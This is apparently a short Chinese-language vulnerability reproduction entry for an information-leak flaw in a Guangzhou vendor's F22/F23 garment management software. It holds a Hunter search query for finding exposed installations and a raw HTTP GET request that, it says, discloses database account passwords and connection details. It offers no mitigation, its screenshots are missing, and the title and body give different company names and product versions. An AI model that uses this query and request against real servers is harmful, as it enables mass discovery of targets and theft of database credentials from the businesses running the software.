G6-2广州锦泰软件科技有限公司-F23服装管理软件系统-InformationLeakage
漏洞描述:
广州锦铭泰软件科技有限公司,是一家专业为品牌服饰鞋包企业提供信息化解决方案的高科技企业,该公司开发的F22服装管理软件系统存在信息泄漏漏洞,攻击者最终可利用该漏洞获取数据库账号密码等连接信息。
网站图片:
网络测绘:
Hunter 语法:
- hunterweb.body=“(images/login_c05-05.gif)”
漏洞复现:
payload:
GET /pos/index_login.asp HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
效果图: